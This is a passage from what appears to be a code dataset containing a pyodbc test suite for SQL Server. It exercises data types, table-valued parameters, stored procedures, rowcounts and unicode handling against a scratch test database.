results['b']\n assert row.type_name == 'varchar'\n assert row.column_size == 3\n cursor.columns('t1', schema=None, catalog=None)\n results = {row.column_name: row for row in cursor}\n row = results['a']\n assert row.type_name == 'int', row.type_name\n row = results['b']\n assert row.type_name == 'varchar'\n assert row.column_size == 3\n row = results['xΏz']\n assert row.type_name == 'varchar'\n assert row.column_size == 4, row.column_size\n for i in range(8, 16):\n table_name = 'pyodbc_89abcdef'[:i]\n cursor.execute(\n f\"\"\"\n IF OBJECT_ID (N'{table_name}', N'U') IS NOT NULL DROP TABLE {table_name};\n CREATE TABLE {table_name} (id INT PRIMARY KEY);\n \"\"\"\n )\n col_count = len([col.column_name for col in cursor.columns(table_name)]\n )\n assert col_count == 1\n cursor.execute(f'drop table {table_name}')\n\n\n<mask token>\n\n\ndef test_emoticons_as_parameter(cursor: pyodbc.Cursor):\n v = 'x 🌜 z'\n cursor.execute('create table t1(s nvarchar(100))')\n cursor.execute('insert into t1 values (?)', v)\n result = cursor.execute('select s from t1').fetchone()[0]\n assert result == v\n\n\ndef test_emoticons_as_literal(cursor: pyodbc.Cursor):\n v = 'x 🌜 z'\n cursor.execute('create table t1(s nvarchar(100))')\n cursor.execute(f\"insert into t1 values (N'{v}')\")\n result = cursor.execute('select s from t1').fetchone()[0]\n assert result == v\n\n\ndef _test_tvp(cursor: pyodbc.Cursor, diff_schema):\n pyodbc.native_uuid = True\n procname = 'SelectTVP'\n typename = 'TestTVP'\n if diff_schema:\n schemaname = 'myschema'\n procname = schemaname + '.' + procname\n typenameonly = typename\n typename = schemaname + '.' 
+ typename\n try:\n cursor.execute('drop procedure ' + procname)\n except:\n pass\n try:\n cursor.execute('drop type ' + typename)\n except:\n pass\n if diff_schema:\n try:\n cursor.execute('drop schema ' + schemaname)\n except:\n pass\n cursor.commit()\n if diff_schema:\n cursor.execute('CREATE SCHEMA myschema')\n cursor.commit()\n cursor.execute(\n f\"\"\"\n CREATE TYPE {typename} AS TABLE(\n c01 VARCHAR(255),\n c02 VARCHAR(MAX),\n c03 VARBINARY(255),\n c04 VARBINARY(MAX),\n c05 BIT,\n c06 DATE,\n c07 TIME,\n c08 DATETIME2(5),\n c09 BIGINT,\n c10 FLOAT,\n c11 NUMERIC(38, 24),\n c12 UNIQUEIDENTIFIER)\n \"\"\"\n )\n cursor.commit()\n cursor.execute(\n f\"\"\"\n CREATE PROCEDURE {procname} @TVP {typename} READONLY\n AS SELECT * FROM @TVP;\n \"\"\"\n )\n cursor.commit()\n VERY_LONG_LEN = 2000000\n long_string = ''.join(chr(i) for i in range(32, 127))\n long_bytearray = bytes(list(range(255)))\n very_long_string = long_string * (VERY_LONG_LEN // len(long_string))\n very_long_bytearray = long_bytearray * (VERY_LONG_LEN // len(\n long_bytearray))\n params = [('abc', 'abc', bytes([209, 206, 250, 206]), bytes([15, 241, \n 206, 202, 254]), True, date(1997, 8, 29), time(9, 13, 39), datetime\n (2018, 11, 13, 13, 33, 26, 298420), 1234567, 3.14, Decimal(\n '31234567890123.141243449787580175325274'), uuid.UUID(\n '4fe34a93-e574-04cc-200a-353f0d1770b1')), ('', '', bytes([0, 1, 2, \n 3, 4]), bytes([0, 1, 2, 3, 4, 5]), False, date(1, 1, 1), time(0, 0,\n 0), datetime(1, 1, 1, 0, 0, 0, 0), -9223372036854775808, -1.79e+308,\n Decimal('0.000000000000000000000001'), uuid.UUID(\n '33f7504c-2bac-1b83-01d1-7434a7ba6a17')), (long_string,\n very_long_string, bytes(long_bytearray), bytes(very_long_bytearray),\n True, date(9999, 12, 31), time(23, 59, 59), datetime(9999, 12, 31, \n 23, 59, 59, 999990), 9223372036854775807, 1.79e+308, Decimal(\n '99999999999999.999999999999999999999999'), uuid.UUID(\n 'ffffffff-ffff-ffff-ffff-ffffffffffff'))]\n if diff_schema:\n p1 = [[typenameonly, schemaname] + params]\n else:\n p1 = [params]\n result_array = [tuple(row) for row in cursor.execute(\n f'exec {procname} ?', p1).fetchall()]\n for row, param in zip(result_array, params):\n if row != param:\n for r, p in zip(row, param):\n assert r == p\n params = []\n p1 = [params]\n if diff_schema:\n p1 = [[typenameonly, schemaname] + params]\n else:\n p1 = [params]\n result_array = cursor.execute(f'exec {procname} ?', p1).fetchall()\n assert result_array == params\n\n\[email protected](IS_FREEDTS, reason='FreeTDS does not support TVP')\ndef test_tvp(cursor: pyodbc.Cursor):\n _test_tvp(cursor, False)\n\n\[email protected](IS_FREEDTS, reason='FreeTDS does not support TVP')\ndef test_tvp_diffschema(cursor: pyodbc.Cursor):\n _test_tvp(cursor, True)\n\n\ndef get_sqlserver_version(cursor: pyodbc.Cursor):\n \"\"\"\n Returns the major version: 8-->2000, 9-->2005, 10-->2008\n \"\"\"\n cursor.execute(\"exec master..xp_msver 'ProductVersion'\")\n row = cursor.fetchone()\n return int(row.Character_Value.split('.', 1)[0])\n\n\n@lru_cache()\ndef _generate_str(length, encoding=None):\n \"\"\"\n Returns either a string or bytes, depending on whether encoding is provided,\n that is `length` elements long.\n\n If length is None, None is returned. 
This simplifies the tests by letting us put None into\n    an array of other lengths and pass them here, moving the special case check into one place.\n    \"\"\"\n    if length is None:\n        return None\n    v = 'á'\n    remaining = max(0, length - len(v))\n    if remaining:\n        seed = '0123456789-abcdefghijklmnopqrstuvwxyz-'\n        if remaining <= len(seed):\n            v += seed\n        else:\n            # ceiling division: repeat the seed just enough times to cover `remaining`\n            c = (remaining + len(seed) - 1) // len(seed)\n            v += seed * c\n    if encoding:\n        v = v.encode(encoding)\n    v = v[:length]\n    return v\n",
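A quick illustrative check of the ceiling-division idiom in _generate_str above: repeating the 39-character seed ceil(remaining / len(seed)) times always yields at least `remaining` characters before the final v[:length] truncation. The lengths below are drawn from the fencepost-size lists used by the tests:

seed = '0123456789-abcdefghijklmnopqrstuvwxyz-'
for length in [1, 255, 256, 511, 512, 4096, 20 * 1024]:
    remaining = max(0, length - 1)                # one character is taken by the 'á' prefix
    c = (remaining + len(seed) - 1) // len(seed)  # ceiling division
    assert c * len(seed) >= remaining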
"step-5": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport os, uuid, re, sys\nfrom decimal import Decimal\nfrom datetime import date, time, datetime\nfrom functools import lru_cache\nfrom typing import Iterator\n\nimport pyodbc, pytest\n\n\n# WARNING: Wow Microsoft always manages to do the stupidest thing possible always trying to be\n# smarter than everyone. I worked with their APIs for since before \"OLE\" and it has always\n# been a nanny state. They won't read the UID and PWD from odbc.ini because it isn't secure.\n# Really? Less secure than what? The next hack someone is going to use. Do the straight\n# forward thing and explain how to secure it. it isn't their business how I deploy and secure.\n#\n# For every other DB we use a single default DSN but you can pass your own via an environment\n# variable. For SS, we can't just use a default DSN unless you want to go trusted. (Which is\n# more secure? No.) It'll be put into .bashrc most likely. Way to go. Now I'll go rename\n# all of the others to DB specific names instead of PYODBC_CNXNSTR. Hot garbage as usual.\n\nCNXNSTR = os.environ.get('PYODBC_SQLSERVER', 'DSN=pyodbc-sqlserver')\n\n\ndef connect(autocommit=False, attrs_before=None):\n return pyodbc.connect(CNXNSTR, autocommit=autocommit, attrs_before=attrs_before)\n\n\nDRIVER = connect().getinfo(pyodbc.SQL_DRIVER_NAME)\n\nIS_FREEDTS = bool(re.search('tsodbc', DRIVER, flags=re.IGNORECASE))\nIS_MSODBCSQL = bool(re.search(r'(msodbcsql|sqlncli|sqlsrv32\\.dll)', DRIVER, re.IGNORECASE))\n\n\ndef _get_sqlserver_year():\n \"\"\"\n Returns the release year of the current version of SQL Server, used to skip tests for\n features that are not supported. If the current DB is not SQL Server, 0 is returned.\n \"\"\"\n # We used to use the major version, but most documentation on the web refers to the year\n # (e.g. 
SQL Server 2019) so we'll use that for skipping tests that do not apply.\n if not IS_MSODBCSQL:\n return 0\n cnxn = connect()\n cursor = cnxn.cursor()\n row = cursor.execute(\"exec master..xp_msver 'ProductVersion'\").fetchone()\n major = row.Character_Value.split('.', 1)[0]\n return {\n # https://sqlserverbuilds.blogspot.com/\n '8': 2000, '9': 2005, '10': 2008, '11': 2012, '12': 2014,\n '13': 2016, '14': 2017, '15': 2019, '16': 2022\n }[major]\n\n\nSQLSERVER_YEAR = _get_sqlserver_year()\n\n\[email protected]()\ndef cursor() -> Iterator[pyodbc.Cursor]:\n cnxn = connect()\n cur = cnxn.cursor()\n\n cur.execute(\"drop table if exists t1\")\n cur.execute(\"drop table if exists t2\")\n cur.execute(\"drop table if exists t3\")\n cnxn.commit()\n\n yield cur\n\n if not cnxn.closed:\n cur.close()\n cnxn.close()\n\n\ndef test_text(cursor: pyodbc.Cursor):\n _test_vartype(cursor, 'text')\n\n\ndef test_varchar(cursor: pyodbc.Cursor):\n _test_vartype(cursor, 'varchar')\n\n\ndef test_nvarchar(cursor: pyodbc.Cursor):\n _test_vartype(cursor, 'nvarchar')\n\n\ndef test_varbinary(cursor: pyodbc.Cursor):\n _test_vartype(cursor, 'varbinary')\n\n\[email protected](SQLSERVER_YEAR < 2005, reason='(max) not supported until 2005')\ndef test_unicode_longmax(cursor: pyodbc.Cursor):\n # Issue 188:\tSegfault when fetching NVARCHAR(MAX) data over 511 bytes\n cursor.execute(\"select cast(replicate(N'x', 512) as nvarchar(max))\")\n\n\ndef test_char(cursor: pyodbc.Cursor):\n value = \"testing\"\n cursor.execute(\"create table t1(s char(7))\")\n cursor.execute(\"insert into t1 values(?)\", \"testing\")\n v = cursor.execute(\"select * from t1\").fetchone()[0]\n assert v == value\n\n\ndef test_int(cursor: pyodbc.Cursor):\n _test_scalar(cursor, 'int', [None, -1, 0, 1, 12345678])\n\n\ndef test_bigint(cursor: pyodbc.Cursor):\n _test_scalar(cursor, 'bigint', [None, -1, 0, 1, 0x123456789, 0x7FFFFFFF, 0xFFFFFFFF,\n 0x123456789])\n\n\ndef test_overflow_int(cursor: pyodbc.Cursor):\n # python allows integers of any size, bigger than an 8 byte int can contain\n input = 9999999999999999999999999999999999999\n cursor.execute(\"create table t1(d bigint)\")\n with pytest.raises(OverflowError):\n cursor.execute(\"insert into t1 values (?)\", input)\n result = cursor.execute(\"select * from t1\").fetchall()\n assert result == []\n\n\ndef test_float(cursor: pyodbc.Cursor):\n _test_scalar(cursor, 'float', [None, -200, -1, 0, 1, 1234.5, -200, .00012345])\n\n\ndef test_non_numeric_float(cursor: pyodbc.Cursor):\n cursor.execute(\"create table t1(d float)\")\n for input in (float('+Infinity'), float('-Infinity'), float('NaN')):\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.execute(\"insert into t1 values (?)\", input)\n\n\ndef test_drivers():\n p = pyodbc.drivers()\n assert isinstance(p, list)\n\n\ndef test_datasources():\n p = pyodbc.dataSources()\n assert isinstance(p, dict)\n\n\ndef test_getinfo_string():\n cnxn = connect()\n value = cnxn.getinfo(pyodbc.SQL_CATALOG_NAME_SEPARATOR)\n assert isinstance(value, str)\n\n\ndef test_getinfo_bool():\n cnxn = connect()\n value = cnxn.getinfo(pyodbc.SQL_ACCESSIBLE_TABLES)\n assert isinstance(value, bool)\n\n\ndef test_getinfo_int():\n cnxn = connect()\n value = cnxn.getinfo(pyodbc.SQL_DEFAULT_TXN_ISOLATION)\n assert isinstance(value, int)\n\n\ndef test_getinfo_smallint():\n cnxn = connect()\n value = cnxn.getinfo(pyodbc.SQL_CONCAT_NULL_BEHAVIOR)\n assert isinstance(value, int)\n\n\ndef test_no_fetch(cursor: pyodbc.Cursor):\n # Issue 89 with FreeTDS: Multiple selects (or catalog functions that 
issue selects) without\n # fetches seem to confuse the driver.\n cursor.execute('select 1')\n cursor.execute('select 1')\n cursor.execute('select 1')\n\n\ndef test_decode_meta(cursor: pyodbc.Cursor):\n \"\"\"\n Ensure column names with non-ASCII characters are converted using the configured encodings.\n \"\"\"\n # This is from GitHub issue #190\n cursor.execute(\"create table t1(a int)\")\n cursor.execute(\"insert into t1 values (1)\")\n cursor.execute('select a as \"Tipología\" from t1')\n assert cursor.description[0][0] == \"Tipología\"\n\n\ndef test_exc_integrity(cursor: pyodbc.Cursor):\n \"Make sure an IntegretyError is raised\"\n # This is really making sure we are properly encoding and comparing the SQLSTATEs.\n cursor.execute(\"create table t1(s1 varchar(10) primary key)\")\n cursor.execute(\"insert into t1 values ('one')\")\n with pytest.raises(pyodbc.IntegrityError):\n cursor.execute(\"insert into t1 values ('one')\")\n\n\ndef test_multiple_bindings(cursor: pyodbc.Cursor):\n \"More than one bind and select on a cursor\"\n cursor.execute(\"create table t1(n int)\")\n cursor.execute(\"insert into t1 values (?)\", 1)\n cursor.execute(\"insert into t1 values (?)\", 2)\n cursor.execute(\"insert into t1 values (?)\", 3)\n for _ in range(3):\n cursor.execute(\"select n from t1 where n < ?\", 10)\n cursor.execute(\"select n from t1 where n < 3\")\n\n\ndef test_different_bindings(cursor: pyodbc.Cursor):\n cursor.execute(\"create table t1(n int)\")\n cursor.execute(\"create table t2(d datetime)\")\n cursor.execute(\"insert into t1 values (?)\", 1)\n cursor.execute(\"insert into t2 values (?)\", datetime.now())\n\n\nSMALL_FENCEPOST_SIZES = [None, 0, 1, 255, 256, 510, 511, 512, 1023, 1024, 2047, 2048, 4000]\nLARGE_FENCEPOST_SIZES = SMALL_FENCEPOST_SIZES + [4095, 4096, 4097, 10 * 1024, 20 * 1024]\n\n\ndef _test_vartype(cursor: pyodbc.Cursor, datatype):\n\n if datatype == 'text':\n lengths = LARGE_FENCEPOST_SIZES\n else:\n lengths = SMALL_FENCEPOST_SIZES\n\n if datatype == 'text':\n cursor.execute(f\"create table t1(c1 {datatype})\")\n else:\n maxlen = lengths[-1]\n cursor.execute(f\"create table t1(c1 {datatype}({maxlen}))\")\n\n for length in lengths:\n cursor.execute(\"delete from t1\")\n\n encoding = (datatype in ('blob', 'varbinary')) and 'utf8' or None\n value = _generate_str(length, encoding=encoding)\n\n try:\n cursor.execute(\"insert into t1 values(?)\", value)\n except pyodbc.Error as ex:\n msg = f'{datatype} insert failed: length={length} len={len(value)}'\n raise Exception(msg) from ex\n\n v = cursor.execute(\"select * from t1\").fetchone()[0]\n assert v == value\n\n\ndef _test_scalar(cursor: pyodbc.Cursor, datatype, values):\n \"\"\"\n A simple test wrapper for types that are identical when written and read.\n \"\"\"\n cursor.execute(f\"create table t1(c1 {datatype})\")\n for value in values:\n cursor.execute(\"delete from t1\")\n cursor.execute(\"insert into t1 values (?)\", value)\n v = cursor.execute(\"select c1 from t1\").fetchone()[0]\n assert v == value\n\n\ndef test_noscan(cursor: pyodbc.Cursor):\n assert cursor.noscan is False\n cursor.noscan = True\n assert cursor.noscan is True\n\n\ndef test_nonnative_uuid(cursor: pyodbc.Cursor):\n # The default is False meaning we should return a string. 
Note that\n # SQL Server seems to always return uppercase.\n value = uuid.uuid4()\n cursor.execute(\"create table t1(n uniqueidentifier)\")\n cursor.execute(\"insert into t1 values (?)\", value)\n\n pyodbc.native_uuid = False\n result = cursor.execute(\"select n from t1\").fetchval()\n assert isinstance(result, str)\n assert result == str(value).upper()\n pyodbc.native_uuid = True\n\n\ndef test_native_uuid(cursor: pyodbc.Cursor):\n # When true, we should return a uuid.UUID object.\n value = uuid.uuid4()\n cursor.execute(\"create table t1(n uniqueidentifier)\")\n cursor.execute(\"insert into t1 values (?)\", value)\n\n pyodbc.native_uuid = True\n result = cursor.execute(\"select n from t1\").fetchval()\n assert isinstance(result, uuid.UUID)\n assert value == result\n\n\ndef test_nextset(cursor: pyodbc.Cursor):\n cursor.execute(\"create table t1(i int)\")\n for i in range(4):\n cursor.execute(\"insert into t1(i) values(?)\", i)\n\n cursor.execute(\n \"\"\"\n select i from t1 where i < 2 order by i;\n select i from t1 where i >= 2 order by i\n \"\"\")\n\n for i, row in enumerate(cursor):\n assert i == row.i\n\n assert cursor.nextset()\n\n for i, row in enumerate(cursor):\n assert i + 2 == row.i\n\n\[email protected](IS_FREEDTS, reason='https://github.com/FreeTDS/freetds/issues/230')\ndef test_nextset_with_raiserror(cursor: pyodbc.Cursor):\n cursor.execute(\"select i = 1; RAISERROR('c', 16, 1);\")\n row = next(cursor)\n assert 1 == row.i\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.nextset()\n\n\ndef test_fixed_unicode(cursor: pyodbc.Cursor):\n value = \"t\\xebsting\"\n cursor.execute(\"create table t1(s nchar(7))\")\n cursor.execute(\"insert into t1 values(?)\", \"t\\xebsting\")\n v = cursor.execute(\"select * from t1\").fetchone()[0]\n assert isinstance(v, str)\n assert len(v) == len(value)\n # If we alloc'd wrong, the test below might work because of an embedded NULL\n assert v == value\n\n\ndef test_chinese(cursor: pyodbc.Cursor):\n v = '我的'\n cursor.execute(\"SELECT N'我的' AS [Name]\")\n row = cursor.fetchone()\n assert row[0] == v\n\n cursor.execute(\"SELECT N'我的' AS [Name]\")\n rows = cursor.fetchall()\n assert rows[0][0] == v\n\n\ndef test_bit(cursor: pyodbc.Cursor):\n value = True\n cursor.execute(\"create table t1(b bit)\")\n cursor.execute(\"insert into t1 values (?)\", value)\n v = cursor.execute(\"select b from t1\").fetchone()[0]\n assert isinstance(v, bool)\n assert v == value\n\n\ndef test_decimal(cursor: pyodbc.Cursor):\n # From test provided by planders (thanks!) in Issue 91\n\n for (precision, scale, negative) in [\n (1, 0, False), (1, 0, True), (6, 0, False), (6, 2, False), (6, 4, True),\n (6, 6, True), (38, 0, False), (38, 10, False), (38, 38, False), (38, 0, True),\n (38, 10, True), (38, 38, True)]:\n\n try:\n cursor.execute(\"drop table t1\")\n except:\n pass\n\n cursor.execute(f\"create table t1(d decimal({precision}, {scale}))\")\n\n # Construct a decimal that uses the maximum precision and scale.\n sign = negative and '-' or ''\n before = '9' * (precision - scale)\n after = scale and ('.' 
+ '9' * scale) or ''\n decStr = f'{sign}{before}{after}'\n value = Decimal(decStr)\n\n cursor.execute(\"insert into t1 values(?)\", value)\n\n v = cursor.execute(\"select d from t1\").fetchone()[0]\n assert v == value\n\n\ndef test_decimal_e(cursor: pyodbc.Cursor):\n \"\"\"Ensure exponential notation decimals are properly handled\"\"\"\n value = Decimal((0, (1, 2, 3), 5)) # prints as 1.23E+7\n cursor.execute(\"create table t1(d decimal(10, 2))\")\n cursor.execute(\"insert into t1 values (?)\", value)\n result = cursor.execute(\"select * from t1\").fetchone()[0]\n assert result == value\n\n\ndef test_subquery_params(cursor: pyodbc.Cursor):\n \"\"\"Ensure parameter markers work in a subquery\"\"\"\n cursor.execute(\"create table t1(id integer, s varchar(20))\")\n cursor.execute(\"insert into t1 values (?,?)\", 1, 'test')\n row = cursor.execute(\"\"\"\n select x.id\n from (\n select id\n from t1\n where s = ?\n and id between ? and ?\n ) x\n \"\"\", 'test', 1, 10).fetchone()\n assert row is not None\n assert row[0] == 1\n\n\ndef test_close_cnxn():\n \"\"\"Make sure using a Cursor after closing its connection doesn't crash.\"\"\"\n\n cnxn = connect()\n cursor = cnxn.cursor()\n\n cursor.execute(\"drop table if exists t1\")\n cursor.execute(\"create table t1(id integer, s varchar(20))\")\n cursor.execute(\"insert into t1 values (?,?)\", 1, 'test')\n cursor.execute(\"select * from t1\")\n\n cnxn.close()\n\n # Now that the connection is closed, we expect an exception. (If the code attempts to use\n # the HSTMT, we'll get an access violation instead.)\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.execute(\"select * from t1\")\n\n\ndef test_empty_string(cursor: pyodbc.Cursor):\n cursor.execute(\"create table t1(s varchar(20))\")\n cursor.execute(\"insert into t1 values(?)\", \"\")\n\n\ndef test_empty_string_encoding():\n cnxn = connect()\n cnxn.setdecoding(pyodbc.SQL_CHAR, encoding='shift_jis')\n value = \"\"\n cursor = cnxn.cursor()\n cursor.execute(\"create table t1(s varchar(20))\")\n cursor.execute(\"insert into t1 values(?)\", value)\n v = cursor.execute(\"select * from t1\").fetchone()[0]\n assert v == value\n\n\ndef test_fixed_str(cursor: pyodbc.Cursor):\n value = \"testing\"\n cursor.execute(\"create table t1(s char(7))\")\n cursor.execute(\"insert into t1 values(?)\", value)\n v = cursor.execute(\"select * from t1\").fetchone()[0]\n assert isinstance(v, str)\n assert len(v) == len(value)\n # If we alloc'd wrong, the test below might work because of an embedded NULL\n assert v == value\n\n\ndef test_empty_unicode(cursor: pyodbc.Cursor):\n cursor.execute(\"create table t1(s nvarchar(20))\")\n cursor.execute(\"insert into t1 values(?)\", \"\")\n\n\ndef test_empty_unicode_encoding():\n cnxn = connect()\n cnxn.setdecoding(pyodbc.SQL_CHAR, encoding='shift_jis')\n value = \"\"\n cursor = cnxn.cursor()\n cursor.execute(\"create table t1(s nvarchar(20))\")\n cursor.execute(\"insert into t1 values(?)\", value)\n v = cursor.execute(\"select * from t1\").fetchone()[0]\n assert v == value\n\n\ndef test_negative_row_index(cursor: pyodbc.Cursor):\n cursor.execute(\"create table t1(s varchar(20))\")\n cursor.execute(\"insert into t1 values(?)\", \"1\")\n row = cursor.execute(\"select * from t1\").fetchone()\n assert row[0] == \"1\"\n assert row[-1] == \"1\"\n\n\ndef test_version():\n assert 3 == len(pyodbc.version.split('.')) # 1.3.1 etc.\n\n\[email protected](IS_MSODBCSQL and SQLSERVER_YEAR < 2008,\n reason='Date not supported until 2008?')\ndef test_date(cursor: pyodbc.Cursor):\n value = 
date.today()\n\n cursor.execute(\"create table t1(d date)\")\n cursor.execute(\"insert into t1 values (?)\", value)\n\n result = cursor.execute(\"select d from t1\").fetchone()[0]\n assert isinstance(result, date)\n assert value == result\n\n\[email protected](IS_MSODBCSQL and SQLSERVER_YEAR < 2008,\n reason='Time not supported until 2008?')\ndef test_time(cursor: pyodbc.Cursor):\n value = datetime.now().time()\n\n # We aren't yet writing values using the new extended time type so the value written to the\n # database is only down to the second.\n value = value.replace(microsecond=0)\n\n cursor.execute(\"create table t1(t time)\")\n cursor.execute(\"insert into t1 values (?)\", value)\n\n result = cursor.execute(\"select t from t1\").fetchone()[0]\n assert isinstance(result, time)\n assert value == result\n\n\ndef test_datetime(cursor: pyodbc.Cursor):\n value = datetime(2007, 1, 15, 3, 4, 5)\n\n cursor.execute(\"create table t1(dt datetime)\")\n cursor.execute(\"insert into t1 values (?)\", value)\n\n result = cursor.execute(\"select dt from t1\").fetchone()[0]\n assert isinstance(result, datetime)\n assert value == result\n\n\ndef test_datetime_fraction(cursor: pyodbc.Cursor):\n # SQL Server supports milliseconds, but Python's datetime supports nanoseconds, so the most\n # granular datetime supported is xxx000.\n\n value = datetime(2007, 1, 15, 3, 4, 5, 123000)\n\n cursor.execute(\"create table t1(dt datetime)\")\n cursor.execute(\"insert into t1 values (?)\", value)\n\n result = cursor.execute(\"select dt from t1\").fetchone()[0]\n assert isinstance(result, datetime)\n assert value == result\n\n\ndef test_datetime_fraction_rounded(cursor: pyodbc.Cursor):\n # SQL Server supports milliseconds, but Python's datetime supports nanoseconds. pyodbc\n # rounds down to what the database supports.\n\n full = datetime(2007, 1, 15, 3, 4, 5, 123456)\n rounded = datetime(2007, 1, 15, 3, 4, 5, 123000)\n\n cursor.execute(\"create table t1(dt datetime)\")\n cursor.execute(\"insert into t1 values (?)\", full)\n\n result = cursor.execute(\"select dt from t1\").fetchone()[0]\n assert isinstance(result, datetime)\n assert rounded == result\n\n\ndef test_datetime2(cursor: pyodbc.Cursor):\n value = datetime(2007, 1, 15, 3, 4, 5)\n\n cursor.execute(\"create table t1(dt datetime2)\")\n cursor.execute(\"insert into t1 values (?)\", value)\n\n result = cursor.execute(\"select dt from t1\").fetchone()[0]\n assert isinstance(result, datetime)\n assert value == result\n\n\ndef test_sp_results(cursor: pyodbc.Cursor):\n cursor.execute(\n \"\"\"\n Create procedure proc1\n AS\n select top 10 name, id, xtype, refdate\n from sysobjects\n \"\"\")\n rows = cursor.execute(\"exec proc1\").fetchall()\n assert isinstance(rows, list)\n assert len(rows) == 10 # there has to be at least 10 items in sysobjects\n assert isinstance(rows[0].refdate, datetime)\n\n\ndef test_sp_results_from_temp(cursor: pyodbc.Cursor):\n\n # Note: I've used \"set nocount on\" so that we don't get the number of rows deleted from\n # #tmptable. 
If you don't do this, you'd need to call nextset() once to skip it.\n\n cursor.execute(\n \"\"\"\n Create procedure proc1\n AS\n set nocount on\n select top 10 name, id, xtype, refdate\n into #tmptable\n from sysobjects\n\n select * from #tmptable\n \"\"\")\n cursor.execute(\"exec proc1\")\n assert cursor.description is not None\n assert len(cursor.description) == 4\n\n rows = cursor.fetchall()\n assert isinstance(rows, list)\n assert len(rows) == 10 # there has to be at least 10 items in sysobjects\n assert isinstance(rows[0].refdate, datetime)\n\n\ndef test_sp_results_from_vartbl(cursor: pyodbc.Cursor):\n cursor.execute(\n \"\"\"\n Create procedure proc1\n AS\n set nocount on\n declare @tmptbl table(name varchar(100), id int, xtype varchar(4), refdate datetime)\n\n insert into @tmptbl\n select top 10 name, id, xtype, refdate\n from sysobjects\n\n select * from @tmptbl\n \"\"\")\n cursor.execute(\"exec proc1\")\n rows = cursor.fetchall()\n assert isinstance(rows, list)\n assert len(rows) == 10 # there has to be at least 10 items in sysobjects\n assert isinstance(rows[0].refdate, datetime)\n\n\ndef test_sp_with_dates(cursor: pyodbc.Cursor):\n # Reported in the forums that passing two datetimes to a stored procedure doesn't work.\n cursor.execute(\n \"\"\"\n if exists (select * from dbo.sysobjects where id = object_id(N'[test_sp]')\n and OBJECTPROPERTY(id, N'IsProcedure') = 1)\n drop procedure [dbo].[test_sp]\n \"\"\")\n cursor.execute(\n \"\"\"\n create procedure test_sp(@d1 datetime, @d2 datetime)\n AS\n declare @d as int\n set @d = datediff(year, @d1, @d2)\n select @d\n \"\"\")\n cursor.execute(\"exec test_sp ?, ?\", datetime.now(), datetime.now())\n rows = cursor.fetchall()\n assert rows is not None\n assert rows[0][0] == 0 # 0 years apart\n\n\ndef test_sp_with_none(cursor: pyodbc.Cursor):\n # Reported in the forums that passing None caused an error.\n cursor.execute(\n \"\"\"\n if exists (select * from dbo.sysobjects where id = object_id(N'[test_sp]')\n and OBJECTPROPERTY(id, N'IsProcedure') = 1)\n drop procedure [dbo].[test_sp]\n \"\"\")\n cursor.execute(\n \"\"\"\n create procedure test_sp(@x varchar(20))\n AS\n declare @y varchar(20)\n set @y = @x\n select @y\n \"\"\")\n cursor.execute(\"exec test_sp ?\", None)\n rows = cursor.fetchall()\n assert rows is not None\n assert rows[0][0] is None # 0 years apart\n\n\n#\n# rowcount\n#\n\n\ndef test_rowcount_delete(cursor: pyodbc.Cursor):\n assert cursor.rowcount == -1\n cursor.execute(\"create table t1(i int)\")\n count = 4\n for i in range(count):\n cursor.execute(\"insert into t1 values (?)\", i)\n cursor.execute(\"delete from t1\")\n assert cursor.rowcount == count\n\n\ndef test_rowcount_nodata(cursor: pyodbc.Cursor):\n \"\"\"\n This represents a different code path than a delete that deleted something.\n\n The return value is SQL_NO_DATA and code after it was causing an error. We could use\n SQL_NO_DATA to step over the code that errors out and drop down to the same SQLRowCount\n code. On the other hand, we could hardcode a zero return value.\n \"\"\"\n cursor.execute(\"create table t1(i int)\")\n # This is a different code path internally.\n cursor.execute(\"delete from t1\")\n assert cursor.rowcount == 0\n\n\ndef test_rowcount_select(cursor: pyodbc.Cursor):\n \"\"\"\n Ensure Cursor.rowcount is set properly after a select statement.\n\n pyodbc calls SQLRowCount after each execute and sets Cursor.rowcount, but SQL Server 2005\n returns -1 after a select statement, so we'll test for that behavior. 
This is valid\n behavior according to the DB API specification, but people don't seem to like it.\n \"\"\"\n cursor.execute(\"create table t1(i int)\")\n count = 4\n for i in range(count):\n cursor.execute(\"insert into t1 values (?)\", i)\n cursor.execute(\"select * from t1\")\n assert cursor.rowcount == -1\n\n rows = cursor.fetchall()\n assert len(rows) == count\n assert cursor.rowcount == -1\n\n\ndef test_rowcount_reset(cursor: pyodbc.Cursor):\n \"Ensure rowcount is reset after DDL\"\n cursor.execute(\"create table t1(i int)\")\n count = 4\n for i in range(count):\n cursor.execute(\"insert into t1 values (?)\", i)\n assert cursor.rowcount == 1\n\n cursor.execute(\"create table t2(i int)\")\n ddl_rowcount = (0 if IS_FREEDTS else -1)\n assert cursor.rowcount == ddl_rowcount\n\n\ndef test_retcursor_delete(cursor: pyodbc.Cursor):\n cursor.execute(\"create table t1(i int)\")\n cursor.execute(\"insert into t1 values (1)\")\n v = cursor.execute(\"delete from t1\")\n assert v == cursor\n\n\ndef test_retcursor_nodata(cursor: pyodbc.Cursor):\n \"\"\"\n This represents a different code path than a delete that deleted something.\n\n The return value is SQL_NO_DATA and code after it was causing an error. We could use\n SQL_NO_DATA to step over the code that errors out and drop down to the same SQLRowCount\n code.\n \"\"\"\n cursor.execute(\"create table t1(i int)\")\n # This is a different code path internally.\n v = cursor.execute(\"delete from t1\")\n assert v == cursor\n\n\ndef test_retcursor_select(cursor: pyodbc.Cursor):\n cursor.execute(\"create table t1(i int)\")\n cursor.execute(\"insert into t1 values (1)\")\n v = cursor.execute(\"select * from t1\")\n assert v == cursor\n\n\ndef table_with_spaces(cursor: pyodbc.Cursor):\n \"Ensure we can select using [x z] syntax\"\n\n try:\n cursor.execute(\"create table [test one](int n)\")\n cursor.execute(\"insert into [test one] values(1)\")\n cursor.execute(\"select * from [test one]\")\n v = cursor.fetchone()[0]\n assert v == 1\n finally:\n cursor.rollback()\n\n\ndef test_lower_case():\n \"Ensure pyodbc.lowercase forces returned column names to lowercase.\"\n try:\n pyodbc.lowercase = True\n cnxn = connect()\n cursor = cnxn.cursor()\n\n cursor.execute(\"create table t1(Abc int, dEf int)\")\n cursor.execute(\"select * from t1\")\n\n names = [t[0] for t in cursor.description]\n names.sort()\n\n assert names == [\"abc\", \"def\"]\n finally:\n # Put it back so other tests don't fail.\n pyodbc.lowercase = False\n\n\ndef test_row_description(cursor: pyodbc.Cursor):\n \"\"\"\n Ensure Cursor.description is accessible as Row.cursor_description.\n \"\"\"\n 